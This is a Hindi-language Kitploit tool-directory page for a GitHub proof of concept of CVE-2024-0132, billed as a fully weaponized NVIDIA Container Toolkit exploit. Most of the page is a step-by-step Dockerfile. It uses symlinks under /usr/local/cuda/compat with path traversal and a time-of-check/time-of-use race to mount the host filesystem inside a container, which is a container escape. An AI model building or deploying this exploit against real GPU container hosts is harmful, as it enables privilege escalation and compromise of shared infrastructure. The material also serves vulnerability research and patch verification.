Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-0132 — CVE-2024-0132 – पूर्ण रूप से हथियारबद्ध NVIDIA Container Toolkit एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/r0binak/cve-2024-0132
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणक्लाउड सुरक्षाकंटेनर एस्केप
GitHubr0binak/cve-2024-0132

CVE-2024-0132

CVE-2024-0132 – पूर्ण रूप से हथियारबद्ध NVIDIA Container Toolkit एक्सप्लॉइट

रिपॉजिटरी देखें
6131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-0132

CVE-2024-0132 PoC

चलिए एक बेस इमेज चुनकर शुरू करते हैं। सिस्टम में लाइब्रेरीज़ की व्यवस्था इस पर निर्भर करती है कि वह क्या होगी। उदाहरण के लिए, alpine के लिए यह /usr/lib64/ होगा, ubuntu के लिए यह /usr/lib/x86_64-linux-gnu होगा। हम बेस इमेज के रूप में ubuntu का उपयोग करेंगे।

root@kitploit:~
FROM ubuntu

Nvidia कंटेनर टूलकिट कंटेनर के अंदर /usr/local/cuda/compat/ में लाइब्रेरीज़ की जाँच करता है और फिर उन्हें मुख्य लाइब्रेरी निर्देशिका में माउंट करता है, इस इमेज (ubuntu) के लिए यह /usr/lib/x86_64-linux-gnu होगा।

लिंक भी माउंट किए जाते हैं, इसलिए आप इमेज से किसी भी फ़ाइल और निर्देशिका को /usr/lib/x86_64-linux-gnu पर माउंट कर सकते हैं। यह जाँचता है कि लिंक कंटेनर के अंदर हल किया गया है, यह पथ ट्रैवर्सल के लिए एकाधिक ../ का उपयोग नहीं कर सकता है। हालाँकि, /usr/local/cuda/compat/ के माध्यम से इन-कंटेनर माउंट का दो बार उपयोग करके इसे दरकिनार किया जा सकता है, इसलिए TOCTOU।

/usr/local/cuda/compat/ से माउंट करने की प्रक्रिया के बारे में और पढ़ें:

  • https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
  • https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768
root@kitploit:~
RUN mkdir -p /usr/local/cuda/compat/

दो निर्देशिकाएँ बनाएँ:

  1. मूल निर्देशिका में test की सामग्री के साथ एक सामान्य फ़ाइल होगी।
root@kitploit:~
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
  1. समान नाम वाली दूसरी निर्देशिका में फ़ाइल के बजाय पथ ट्रैवर्सल वाला एक लिंक होगा।
root@kitploit:~
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

फ़िल्टर को संतुष्ट करने के लिए libdxcore.so नाम चुना गया है। प्रमुख संस्करण (1337) वास्तविक ड्राइवर संस्करण से भिन्न होना चाहिए।

/usr/local/cuda/compat/ में दो लिंक बनाएँ:

  1. पहला लिंक मूल निर्देशिका /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/ की सामग्री को /pwn/libdxcore.so.1337/ से बदल देगा।
root@kitploit:~
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
  1. दूसरा लिंक /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs को /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs पर माउंट करता है। जाँच के दौरान यह एक सामान्य फ़ाइल होगी, लेकिन माउंट के समय यह एक लिंक होगी जो /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs में थी, इस प्रकार होस्ट फ़ाइलसिस्टम /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/ पर माउंट हो जाएगा।
root@kitploit:~
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
टूल डाउनलोड करें